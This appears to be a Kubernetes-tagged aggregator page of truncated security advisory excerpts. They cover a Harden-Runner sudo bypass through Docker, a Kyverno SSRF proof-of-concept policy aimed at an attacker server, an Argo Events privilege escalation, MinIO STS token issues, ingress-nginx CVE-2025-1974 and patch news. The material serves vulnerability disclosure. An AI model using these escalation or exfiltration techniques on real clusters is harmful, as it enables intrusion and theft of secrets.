#kubernetes

### Summary Harden-Runner includes a policy option `disable-sudo` to prevent the GitHub Actions runner user from using sudo. This is implemented by removing the runner user from the sudoers file. However, this control can be bypassed as the runner user, being part of the docker group, can interact with the Docker daemon to launch privileged containers or access the host filesystem. This allows the attacker to regain root access or restore the sudoers file, effectively bypassing the restriction. For an attacker to bypass this control, they would first need the ability to run their malicious code (e.g., by a supply chain attack similar to tj-actions or exploiting a Pwn Request vulnerability)) on the runner. This vulnerability has been fixed in Harden-Runner version `v2.12.0`. ### Impact An attacker with the ability to run their malicious code on a runner configured with `disable-sudo: true` can escalate privileges to root using Docker, defeating the intended security control. ### Aff...

# Prevent token leakage / privilege escalation ## MinIO Operator STS: A Quick Overview MinIO Operator STS is a native IAM Authentication for Kubernetes. MinIO Operator offers support for [Secure Tokens](https://min.io/docs/minio/linux/developers/security-token-service.html?ref=op-gh) (a.k.a. STS) which are a form of temporary access credentials for your MinIO Tenant. In essence, this allows you to control access to your MinIO tenant from your applications without having to explicitly create credentials for each application. For an application to gain access into a MinIO Tenant, a `PolicyBinding` resource is required, granting explicit access to the applications by validating the kubernetes [Service Account](https://kubernetes.io/docs/concepts/security/service-accounts/) authorization token. The service account token is validated as follows: 1. The application calls `AssumeRoleWithWebIdentity` API MinIO Operator provides. 2. MinIO Operator verifies the Service Account token agains...

### Summary An attacker with the ability to create Kyverno policies in a Kubernetes cluster can use Service Call functionality to perform SSRF to a server under their control in order to exfiltrate data. ### Details According to the documentation, Service Call is intended to address services located inside the Kubernetes cluster, but this method can also resolve external addresses, which allows making requests outside the Kubernetes cluster. https://kyverno.io/docs/writing-policies/external-data-sources/#variables-from-service-calls ### PoC Create a slightly modified Cluster Policy from the documentation. In the url we specify the address of a server controlled by the attacker, for example Burp Collaborator. ```yaml apiVersion: kyverno.io/v1 kind: ClusterPolicy metadata: name: check-namespaces spec: rules: - name: call-extension match: any: - resources: kinds: - ConfigMap context: - name: result apiCall: method: P...

### Summary: A user with permission to create/modify EventSource and Sensor custom resources can gain privileged access to the host system and cluster, even without having direct administrative privileges. ### Details: The `EventSource` and `Sensor` CRs allow the corresponding orchestrated pod to be customized with `spec.template` and `spec.template.container` (with type `k8s.io/api/core/v1.Container`), thus, any specification under `container` such as `command`, `args`, `securityContext `, `volumeMount` can be specified, and applied to the EventSource or Sensor pod due to the code logic below. ```golang if args.EventSource.Spec.Template != nil && args.EventSource.Spec.Template.Container != nil { if err := mergo.Merge(&eventSourceContainer, args.EventSource.Spec.Template.Container, mergo.WithOverride); err != nil { return nil, err } } ``` With these, A user would be able to gain privileged access to the cluster host, if he/she specified the Even...

April Microsoft Patch Tuesday. A total of 153 vulnerabilities, 2 times more than in March. Of these, 32 were added between the March and April MSPTs. Three vulnerabilities show signs of exploitation in the wild: 🔻 EoP – Windows Common Log File System Driver (CVE-2025-29824). An attacker can gain SYSTEM privileges. No technical details yet.🔻 […]

As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, please see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global). View CSAF 1. EXECUTIVE SUMMARY CVSS v3 9.8 ATTENTION: Exploitable remotely/low attack complexity Vendor: Siemens Equipment: Insights Hub Private Cloud Vulnerabilities: Improper Input Validation, Improper Isolation or Compartmentalization 2. RISK EVALUATION Successful exploitation of these vulnerabilities could allow an attacker to perform arbitrary code execution, disclose information, or lead to a denial-of-service condition. 3. TECHNICAL DETAILS 3.1 AFFECTED PRODUCTS Siemens reports that the following products are affected: Siemens Insights Hub Private Cloud: All versions 3.2 VULNERABILITY OVERVIEW 3.2.1 IMPROPER INPUT VALIDATION CWE-20 A security issue was discovered in ing...

Security is an ongoing engineering discipline, it's not just a reaction to a crisis. For example, if you were responsible for a large suspension bridge, you would know that cracks don’t appear overnight. They start as small stress fractures, invisible to the untrained eye. If ignored, these weaknesses eventually lead to structural failures. That’s why regular maintenance, checking for early signs of wear, reinforcing weak points, and applying protective coating is crucial.Security vulnerabilities in IT are often presented like bridge failures that make news headlines. These issues require

Version 1.15.1 might feel like a run-of-the-mill new release of cert-manager Operator for Red Hat OpenShift but actually it features more than a few notable enhancements to improve the security posture of your OpenShift clusters. This exciting release improves the overall security posture of your OpenShift clusters, and expands upon your ability to protect your cluster networking communications with TLS certificates managed by cert-manager. The release of Red Hat OpenShift 4.18 emphasises zero trust architecture, and introduces as Technology Preview, the powerful istio-csr agent via cert-manag

About Remote Code Execution – Kubernetes (CVE-2025-1974) vulnerability. An unauthenticated attacker with access to the pod network can achieve arbitrary code execution in the context of the ingress-nginx controller. This can lead to disclosure of Secrets accessible to the controller. In the default installation, the controller can access all Secrets cluster-wide. 🔹 On March 24, […]

A security issue was discovered in [ingress-nginx](https://github.com/kubernetes/ingress-nginx) where the `auth-url` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller. (Note that in the default installation, the controller can access all Secrets cluster-wide.)